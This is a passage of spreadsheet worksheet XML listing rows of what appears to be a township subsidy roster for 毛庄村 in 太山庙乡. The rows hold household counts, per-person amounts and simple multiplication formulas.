      <c r="H2159" s="14">
        <v>340</v>
      </c>
      <c r="I2159" s="14">
        <f>H2159*G2159</f>
        <v>340</v>
      </c>
      <c r="J2159" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2159" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2160" ht="23" customHeight="1" spans="1:11">
      <c r="A2160" s="13" t="s">
        <v>5714</v>
      </c>
      <c r="B2160" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2160" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2160" s="14" t="s">
        <v>5715</v>
      </c>
      <c r="E2160" s="14" t="s">
        <v>5716</v>
      </c>
      <c r="F2160" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2160" s="14">
        <v>2</v>
      </c>
      <c r="H2160" s="14">
        <v>300</v>
      </c>
      <c r="I2160" s="14">
        <f>H2160*G2160</f>
        <v>600</v>
      </c>
      <c r="J2160" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2160" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2161" ht="23" customHeight="1" spans="1:11">
      <c r="A2161" s="13" t="s">
        <v>5717</v>
      </c>
      <c r="B2161" s="14" t="str">
        <f>B2160</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2161" s="14" t="str">
        <f>C2160</f>
        <v>毛庄村</v>
      </c>
      <c r="D2161" s="13" t="s">
        <v>5718</v>
      </c>
      <c r="E2161" s="13" t="s">
        <v>5719</v>
      </c>
      <c r="F2161" s="14">
        <f>F2160</f>
        <v>4113210704</v>
      </c>
      <c r="G2161" s="14"/>
      <c r="H2161" s="14"/>
      <c r="I2161" s="14"/>
      <c r="J2161" s="14"/>
      <c r="K2161" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2162" ht="23" customHeight="1" spans="1:11">
      <c r="A2162" s="13" t="s">
        <v>5720</v>
      </c>
      <c r="B2162" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2162" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2162" s="14" t="s">
        <v>5721</v>
      </c>
      <c r="E2162" s="14" t="s">
        <v>5682</v>
      </c>
      <c r="F2162" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2162" s="14">
        <v>1</v>
      </c>
      <c r="H2162" s="14">
        <v>340</v>
      </c>
      <c r="I2162" s="14">
        <f>H2162*G2162</f>
        <v>340</v>
      </c>
      <c r="J2162" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2162" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2163" ht="23" customHeight="1" spans="1:11">
      <c r="A2163" s="13" t="s">
        <v>5722</v>
      </c>
      <c r="B2163" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2163" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2163" s="14" t="s">
        <v>5723</v>
      </c>
      <c r="E2163" s="14" t="s">
        <v>5724</v>
      </c>
      <c r="F2163" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2163" s="14">
        <v>1</v>
      </c>
      <c r="H2163" s="14">
        <v>340</v>
      </c>
      <c r="I2163" s="14">
        <f>H2163*G2163</f>
        <v>340</v>
      </c>
      <c r="J2163" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2163" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2164" ht="23" customHeight="1" spans="1:11">
      <c r="A2164" s="13" t="s">
        <v>5725</v>
      </c>
      <c r="B2164" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2164" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2164" s="14" t="s">
        <v>5726</v>
      </c>
      <c r="E2164" s="14" t="s">
        <v>5727</v>
      </c>
      <c r="F2164" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2164" s="14">
        <v>1</v>
      </c>
      <c r="H2164" s="14">
        <v>340</v>
      </c>
      <c r="I2164" s="14">
        <f>H2164*G2164</f>
        <v>340</v>
      </c>
      <c r="J2164" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2164" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2165" ht="23" customHeight="1" spans="1:11">
      <c r="A2165" s="13" t="s">
        <v>5728</v>
      </c>
      <c r="B2165" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2165" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2165" s="14" t="s">
        <v>5729</v>
      </c>
      <c r="E2165" s="14" t="s">
        <v>2879</v>
      </c>
      <c r="F2165" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2165" s="14">
        <v>2</v>
      </c>
      <c r="H2165" s="14">
        <v>320</v>
      </c>
      <c r="I2165" s="14">
        <f>H2165*G2165</f>
        <v>640</v>
      </c>
      <c r="J2165" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2165" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2166" ht="23" customHeight="1" spans="1:11">
      <c r="A2166" s="13" t="s">
        <v>5730</v>
      </c>
      <c r="B2166" s="14" t="str">
        <f>B2165</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2166" s="14" t="str">
        <f>C2165</f>
        <v>毛庄村</v>
      </c>
      <c r="D2166" s="13" t="s">
        <v>5731</v>
      </c>
      <c r="E2166" s="13" t="s">
        <v>5732</v>
      </c>
      <c r="F2166" s="14">
        <f>F2165</f>
        <v>4113210704</v>
      </c>
      <c r="G2166" s="14"/>
      <c r="H2166" s="14"/>
      <c r="I2166" s="14"/>
      <c r="J2166" s="14"/>
      <c r="K2166" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2167" ht="23" customHeight="1" spans="1:11">
      <c r="A2167" s="13" t="s">
        <v>5733</v>
      </c>
      <c r="B2167" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2167" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2167" s="14" t="s">
        <v>5734</v>
      </c>
      <c r="E2167" s="14" t="s">
        <v>5735</v>
      </c>
      <c r="F2167" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2167" s="14">
        <v>2</v>
      </c>
      <c r="H2167" s="14">
        <v>300</v>
      </c>
      <c r="I2167" s="14">
        <f>H2167*G2167</f>
        <v>600</v>
      </c>
      <c r="J2167" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2167" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2168" ht="23" customHeight="1" spans="1:11">
      <c r="A2168" s="13" t="s">
        <v>5736</v>
      </c>
      <c r="B2168" s="14" t="str">
        <f>B2167</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2168" s="14" t="str">
        <f>C2167</f>
        <v>毛庄村</v>
      </c>
      <c r="D2168" s="13" t="s">
        <v>5737</v>
      </c>
      <c r="E2168" s="13" t="s">
        <v>5738</v>
      </c>
      <c r="F2168" s="14">
        <f>F2167</f>
        <v>4113210704</v>
      </c>
      <c r="G2168" s="14"/>
      <c r="H2168" s="14"/>
      <c r="I2168" s="14"/>
      <c r="J2168" s="14"/>
      <c r="K2168" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2169" ht="23" customHeight="1" spans="1:11">
      <c r="A2169" s="13" t="s">
        <v>5739</v>
      </c>
      <c r="B2169" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2169" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2169" s="14" t="s">
        <v>5740</v>
      </c>
      <c r="E2169" s="14" t="s">
        <v>5741</v>
      </c>
      <c r="F2169" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2169" s="14">
        <v>1</v>
      </c>
      <c r="H2169" s="14">
        <v>340</v>
      </c>
      <c r="I2169" s="14">
        <f>H2169*G2169</f>
        <v>340</v>
      </c>
      <c r="J2169" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2169" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2170" ht="23" customHeight="1" spans="1:11">
      <c r="A2170" s="13" t="s">
        <v>5742</v>
      </c>
      <c r="B2170" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2170" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2170" s="14" t="s">
        <v>5743</v>
      </c>
      <c r="E2170" s="14" t="s">
        <v>5588</v>
      </c>
      <c r="F2170" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2170" s="14">
        <v>1</v>
      </c>
      <c r="H2170" s="14">
        <v>340</v>
      </c>
      <c r="I2170" s="14">
        <f>H2170*G2170</f>
        <v>340</v>
      </c>
      <c r="J2170" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2170" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2171" ht="23" customHeight="1" spans="1:11">
      <c r="A2171" s="13" t="s">
        <v>5744</v>
      </c>
      <c r="B2171" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2171" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2171" s="14" t="s">
        <v>5745</v>
      </c>
      <c r="E2171" s="14" t="s">
        <v>5642</v>
      </c>
      <c r="F2171" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2171" s="14">
        <v>1</v>
      </c>
      <c r="H2171" s="14">
        <v>340</v>
      </c>
      <c r="I2171" s="14">
        <f>H2171*G2171</f>
        <v>340</v>
      </c>
      <c r="J2171" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2171" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2172" ht="23" customHeight="1" spans="1:11">
      <c r="A2172" s="13" t="s">
        <v>5746</v>
      </c>
      <c r="B2172" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2172" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2172" s="14" t="s">
        <v>5747</v>
      </c>
      <c r="E2172" s="14" t="s">
        <v>5748</v>
      </c>
      <c r="F2172" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2172" s="14">
        <v>1</v>
      </c>
      <c r="H2172" s="14">
        <v>340</v>
      </c>
      <c r="I2172" s="14">
        <f>H2172*G2172</f>
        <v>340</v>
      </c>
      <c r="J2172" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2172" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2173" ht="23" customHeight="1" spans="1:11">
      <c r="A2173" s="13" t="s">
        <v>5749</v>
      </c>
      <c r="B2173" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2173" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2173" s="14" t="s">
        <v>5750</v>
      </c>
      <c r="E2173" s="14" t="s">
        <v>5631</v>
      </c>
      <c r="F2173" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2173" s="14">
        <v>3</v>
      </c>
      <c r="H2173" s="14">
        <v>265</v>
      </c>
      <c r="I2173" s="14">
        <f>H2173*G2173</f>
        <v>795</v>
      </c>
      <c r="J2173" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2173" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2174" ht="23" customHeight="1" spans="1:11">
      <c r="A2174" s="13" t="s">
        <v>5751</v>
      </c>
      <c r="B2174" s="14" t="str">
        <f>B2173</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2174" s="14" t="str">
        <f>C2173</f>
        <v>毛庄村</v>
      </c>
      <c r="D2174" s="13" t="s">
        <v>5752</v>
      </c>
      <c r="E2174" s="20" t="s">
        <v>5688</v>
      </c>
      <c r="F2174" s="14">
        <f>F2173</f>
        <v>4113210704</v>
      </c>
      <c r="G2174" s="14"/>
      <c r="H2174" s="14"/>
      <c r="I2174" s="14"/>
      <c r="J2174" s="14"/>
      <c r="K2174" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2175" ht="23" customHeight="1" spans="1:11">
      <c r="A2175" s="13" t="s">
        <v>5753</v>
      </c>
      <c r="B2175" s="14" t="str">
        <f>B2174</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2175" s="14" t="str">
        <f>C2174</f>
        <v>毛庄村</v>
      </c>
      <c r="D2175" s="13" t="s">
        <v>5754</v>
      </c>
      <c r="E2175" s="13" t="s">
        <v>5755</v>
      </c>
      <c r="F2175" s="14">
        <f>F2174</f>
        <v>4113210704</v>
      </c>
      <c r="G2175" s="14"/>
      <c r="H2175" s="14"/>
      <c r="I2175" s="14"/>
      <c r="J2175" s="14"/>
      <c r="K2175" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2176" ht="23" customHeight="1" spans="1:11">
      <c r="A2176" s="13" t="s">
        <v>5756</v>
      </c>
      <c r="B2176" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2176" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2176" s="14" t="s">
        <v>5757</v>
      </c>
      <c r="E2176" s="14" t="s">
        <v>5758</v>
      </c>
      <c r="F2176" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2176" s="14">
        <v>2</v>
      </c>
      <c r="H2176" s="14">
        <v>300</v>
      </c>
      <c r="I2176" s="14">
        <f>H2176*G2176</f>
        <v>600</v>
      </c>
      <c r="J2176" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2176" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2177" ht="23" customHeight="1" spans="1:11">
      <c r="A2177" s="13" t="s">
        <v>5759</v>
      </c>
      <c r="B2177" s="14" t="str">
        <f>B2176</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2177" s="14" t="str">
        <f>C2176</f>
        <v>毛庄村</v>
      </c>
      <c r="D2177" s="13" t="s">
        <v>5760</v>
      </c>
      <c r="E2177" s="13" t="s">
        <v>5694</v>
      </c>
      <c r="F2177" s="14">
        <f>F2176</f>
        <v>4113210704</v>
      </c>
      <c r="G2177" s="14"/>
      <c r="H2177" s="14"/>
      <c r="I2177" s="14"/>
      <c r="J2177" s="14"/>
      <c r="K2177" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2178" ht="23" customHeight="1" spans="1:11">
      <c r="A2178" s="13" t="s">
        <v>5761</v>
      </c>
      <c r="B2178" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2178" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2178" s="14" t="s">
        <v>5762</v>
      </c>
      <c r="E2178" s="14" t="s">
        <v>5724</v>
      </c>
      <c r="F2178" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2178" s="14">
        <v>2</v>
      </c>
      <c r="H2178" s="14">
        <v>300</v>
      </c>
      <c r="I2178" s="14">
        <f>H2178*G2178</f>
        <v>600</v>
      </c>
      <c r="J2178" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2178" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2179" ht="23" customHeight="1" spans="1:11">
      <c r="A2179" s="13" t="s">
        <v>5763</v>
      </c>
      <c r="B2179" s="14" t="str">
        <f>B2178</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2179" s="14" t="str">
        <f>C2178</f>
        <v>毛庄村</v>
      </c>
      <c r="D2179" s="13" t="s">
        <v>5764</v>
      </c>
      <c r="E2179" s="13" t="s">
        <v>3589</v>
      </c>
      <c r="F2179" s="14">
        <f>F2178</f>
        <v>4113210704</v>
      </c>
      <c r="G2179" s="14"/>
      <c r="H2179" s="14"/>
      <c r="I2179" s="14"/>
      <c r="J2179" s="14"/>
      <c r="K2179" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2180" ht="23" customHeight="1" spans="1:11">
      <c r="A2180" s="13" t="s">
        <v>5765</v>
      </c>
      <c r="B2180" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2180" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2180" s="14" t="s">
        <v>5766</v>
      </c>
      <c r="E2180" s="14" t="s">
        <v>5767</v>
      </c>
      <c r="F2180" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2180" s="14">
        <v>2</v>
      </c>
      <c r="H2180" s="14">
        <v>300</v>
      </c>
      <c r="I2180" s="14">
        <f>H2180*G2180</f>
        <v>600</v>
      </c>
      <c r="J2180" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2180" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2181" ht="23" customHeight="1" spans="1:11">
      <c r="A2181" s="13" t="s">
        <v>5768</v>
      </c>
      <c r="B2181" s="14" t="str">
        <f>B2180</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2181" s="14" t="str">
        <f>C2180</f>
        <v>毛庄村</v>
      </c>
      <c r="D2181" s="13" t="s">
        <v>5769</v>
      </c>
      <c r="E2181" s="13" t="s">
        <v>3589</v>
      </c>
      <c r="F2181" s="14">
        <f>F2180</f>
        <v>4113210704</v>
      </c>
      <c r="G2181" s="14"/>
      <c r="H2181" s="14"/>
      <c r="I2181" s="14"/>
      <c r="J2181" s="14"/>
      <c r="K2181" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2182" ht="23" customHeight="1" spans="1:11">
      <c r="A2182" s="13" t="s">
        <v>5770</v>
      </c>
      <c r="B2182" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2182" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2182" s="14" t="s">
        <v>5771</v>
      </c>
      <c r="E2182" s="14" t="s">
        <v>5772</v>
      </c>
      <c r="F2182" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2182" s="14">
        <v>1</v>
      </c>
      <c r="H2182" s="14">
        <v>340</v>
      </c>
      <c r="I2182" s="14">
        <f>H2182*G2182</f>
        <v>340</v>
      </c>
      <c r="J2182" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2182" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2183" ht="23" customHeight="1" spans="1:11">
      <c r="A2183" s="13" t="s">
        <v>5773</v>
      </c>
      <c r="B2183" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2183" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2183" s="14" t="s">
        <v>5774</v>
      </c>
      <c r="E2183" s="14" t="s">
        <v>5775</v>
      </c>
      <c r="F2183" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2183" s="14">
        <v>2</v>
      </c>
      <c r="H2183" s="14">
        <v>300</v>
      </c>
      <c r="I2183" s="14">
        <f>H2183*G2183</f>
        <v>600</v>
      </c>
      <c r="J2183" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2183" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2184" ht="23" customHeight="1" spans="1:11">
      <c r="A2184" s="13" t="s">
        <v>5776</v>
      </c>
      <c r="B2184" s="14" t="str">
        <f>B2183</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2184" s="14" t="str">
        <f>C2183</f>
        <v>毛庄村</v>
      </c>
      <c r="D2184" s="13" t="s">
        <v>5777</v>
      </c>
      <c r="E2184" s="13" t="s">
        <v>5202</v>
      </c>
      <c r="F2184" s="14">
        <f>F2183</f>
        <v>4113210704</v>
      </c>
      <c r="G2184" s="14"/>
      <c r="H2184" s="14"/>
      <c r="I2184" s="14"/>
      <c r="J2184" s="14"/>
      <c r="K2184" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2185" ht="23" customHeight="1" spans="1:11">
      <c r="A2185" s="13" t="s">
        <v>5778</v>
      </c>
      <c r="B2185" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2185" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2185" s="14" t="s">
        <v>5779</v>
      </c>
      <c r="E2185" s="14" t="s">
        <v>5202</v>
      </c>
      <c r="F2185" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2185" s="14">
        <v>1</v>
      </c>
      <c r="H2185" s="14">
        <v>340</v>
      </c>
      <c r="I2185" s="14">
        <f>H2185*G2185</f>
        <v>340</v>
      </c>
      <c r="J2185" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2185" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2186" ht="23" customHeight="1" spans="1:11">
      <c r="A2186" s="13" t="s">
        <v>5780</v>
      </c>
      <c r="B2186" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2186" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2186" s="14" t="s">
        <v>5781</v>
      </c>
      <c r="E2186" s="14" t="s">
        <v>5710</v>
      </c>
      <c r="F2186" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2186" s="14">
        <v>2</v>
      </c>
      <c r="H2186" s="14">
        <v>300</v>
      </c>
      <c r="I2186" s="14">
        <f>H2186*G2186</f>
        <v>600</v>
      </c>
      <c r="J2186" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2186" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2187" ht="23" customHeight="1" spans="1:11">
      <c r="A2187" s="13" t="s">
        <v>5782</v>
      </c>
      <c r="B2187" s="14" t="str">
        <f>B2186</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2187" s="14" t="str">
        <f>C2186</f>
        <v>毛庄村</v>
      </c>
      <c r="D2187" s="13" t="s">
        <v>5783</v>
      </c>
      <c r="E2187" s="20" t="s">
        <v>5605</v>
      </c>
      <c r="F2187" s="14">
        <f>F2186</f>
        <v>4113210704</v>
      </c>
      <c r="G2187" s="14"/>
      <c r="H2187" s="14"/>
      <c r="I2187" s="14"/>
      <c r="J2187" s="14"/>
      <c r="K2187" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2188" ht="23" customHeight="1" spans="1:11">
      <c r="A2188" s="13" t="s">
        <v>5784</v>
      </c>
      <c r="B2188" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2188" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2188" s="14" t="s">
        <v>5785</v>
      </c>
      <c r="E2188" s="14" t="s">
        <v>5786</v>
      </c>
      <c r="F2188" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2188" s="14">
        <v>2</v>
      </c>
      <c r="H2188" s="14">
        <v>300</v>
      </c>
      <c r="I2188" s="14">
        <f>H2188*G2188</f>
        <v>600</v>
      </c>
      <c r="J2188" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2188" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2189" ht="23" customHeight="1" spans="1:11">
      <c r="A2189" s="13" t="s">
        <v>5787</v>
      </c>
      <c r="B2189" s="14" t="str">
        <f>B2188</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2189" s="14" t="str">
        <f>C2188</f>
        <v>毛庄村</v>
      </c>
      <c r="D2189" s="13" t="s">
        <v>5788</v>
      </c>
      <c r="E2189" s="13" t="s">
        <v>5789</v>
      </c>
      <c r="F2189" s="14">
        <f>F2188</f>
        <v>4113210704</v>
      </c>
      <c r="G2189" s="14"/>
      <c r="H2189" s="14"/>
      <c r="I2189" s="14"/>
      <c r="J2189" s="14"/>
      <c r="K2189" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2190" ht="23" customHeight="1" spans="1:11">
      <c r="A2190" s="13" t="s">
        <v>5790</v>
      </c>
      <c r="B2190" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2190" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2190" s="14" t="s">
        <v>5791</v>
      </c>
      <c r="E2190" s="14" t="s">
        <v>5786</v>
      </c>
      <c r="F2190" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2190" s="14">
        <v>2</v>
      </c>
      <c r="H2190" s="14">
        <v>300</v>
      </c>
      <c r="I2190" s="14">
        <f>H2190*G2190</f>
        <v>600</v>
      </c>
      <c r="J2190" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2190" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2191" ht="23" customHeight="1" spans="1:11">
      <c r="A2191" s="13" t="s">
        <v>5792</v>
      </c>
      <c r="B2191" s="14" t="str">
        <f>B2190</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2191" s="14" t="str">
        <f>C2190</f>
        <v>毛庄村</v>
      </c>
      <c r="D2191" s="13" t="s">
        <v>5793</v>
      </c>
      <c r="E2191" s="13" t="s">
        <v>5605</v>
      </c>
      <c r="F2191" s="14">
        <f>F2190</f>
        <v>4113210704</v>
      </c>
      <c r="G2191" s="14"/>
      <c r="H2191" s="14"/>
      <c r="I2191" s="14"/>
      <c r="J2191" s="14"/>
      <c r="K2191" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2192" ht="23" customHeight="1" spans="1:11">
      <c r="A2192" s="13" t="s">
        <v>5794</v>
      </c>
      <c r="B2192" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2192" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2192" s="14" t="s">
        <v>5795</v>
      </c>
      <c r="E2192" s="14" t="s">
        <v>3589</v>
      </c>
      <c r="F2192" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2192" s="14">
        <v>1</v>
      </c>
      <c r="H2192" s="14">
        <v>340</v>
      </c>
      <c r="I2192" s="14">
        <f>H2192*G2192</f>
        <v>340</v>
      </c>
      <c r="J2192" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2192" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2193" ht="23" customHeight="1" spans="1:11">
      <c r="A2193" s="13" t="s">
        <v>5796</v>
      </c>
      <c r="B2193" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2193" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2193" s="14" t="s">
        <v>5797</v>
      </c>
      <c r="E2193" s="14" t="s">
        <v>5620</v>
      </c>
      <c r="F2193" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2193" s="14">
        <v>1</v>
      </c>
      <c r="H2193" s="14">
        <v>340</v>
      </c>
      <c r="I2193" s="14">
        <f>H2193*G2193</f>
        <v>340</v>
      </c>
      <c r="J2193" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2193" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2194" ht="23" customHeight="1" spans="1:11">
      <c r="A2194" s="13" t="s">
        <v>5798</v>
      </c>
      <c r="B2194" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2194" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2194" s="14" t="s">
        <v>5799</v>
      </c>
      <c r="E2194" s="14" t="s">
        <v>5724</v>
      </c>
      <c r="F2194" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2194" s="14">
        <v>2</v>
      </c>
      <c r="H2194" s="14">
        <v>300</v>
      </c>
      <c r="I2194" s="14">
        <f>H2194*G2194</f>
        <v>600</v>
      </c>
      <c r="J2194" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2194" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2195" ht="23" customHeight="1" spans="1:11">
      <c r="A2195" s="13" t="s">
        <v>5800</v>
      </c>
      <c r="B2195" s="14" t="str">
        <f>B2194</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2195" s="14" t="str">
        <f>C2194</f>
        <v>毛庄村</v>
      </c>
      <c r="D2195" s="13" t="s">
        <v>5801</v>
      </c>
      <c r="E2195" s="13" t="s">
        <v>5738</v>
      </c>
      <c r="F2195" s="14">
        <f>F2194</f>
        <v>4113210704</v>
      </c>
      <c r="G2195" s="14"/>
      <c r="H2195" s="14"/>
      <c r="I2195" s="14"/>
      <c r="J2195" s="14"/>
      <c r="K2195" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2196" ht="23" customHeight="1" spans="1:11">
      <c r="A2196" s="13" t="s">
        <v>5802</v>
      </c>
      <c r="B2196" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2196" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2196" s="14" t="s">
        <v>5803</v>
      </c>
      <c r="E2196" s="14" t="s">
        <v>5724</v>
      </c>
      <c r="F2196" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2196" s="14">
        <v>2</v>
      </c>
      <c r="H2196" s="14">
        <v>300</v>
      </c>
      <c r="I2196" s="14">
        <f>H2196*G2196</f>
        <v>600</v>
      </c>
      <c r="J2196" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2196" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2197" ht="23" customHeight="1" spans="1:11">
      <c r="A2197" s="13" t="s">
        <v>5804</v>
      </c>
      <c r="B2197" s="14" t="str">
        <f>B2196</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2197" s="14" t="str">
        <f>C2196</f>
        <v>毛庄村</v>
      </c>
      <c r="D2197" s="13" t="s">
        <v>5805</v>
      </c>
      <c r="E2197" s="13" t="s">
        <v>5202</v>
      </c>
      <c r="F2197" s="14">
        <f>F2196</f>
        <v>4113210704</v>
      </c>
      <c r="G2197" s="14"/>
      <c r="H2197" s="14"/>
      <c r="I2197" s="14"/>
      <c r="J2197" s="14"/>
      <c r="K2197" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2198" ht="23" customHeight="1" spans="1:11">
      <c r="A2198" s="13" t="s">
        <v>5806</v>
      </c>
      <c r="B2198" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2198" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2198" s="14" t="s">
        <v>5807</v>
      </c>
      <c r="E2198" s="14" t="s">
        <v>2879</v>
      </c>
      <c r="F2198" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2198" s="14">
        <v>2</v>
      </c>
      <c r="H2198" s="14">
        <v>300</v>
      </c>
      <c r="I2198" s="14">
        <f>H2198*G2198</f>
        <v>600</v>
      </c>
      <c r="J2198" s="14" t="s">
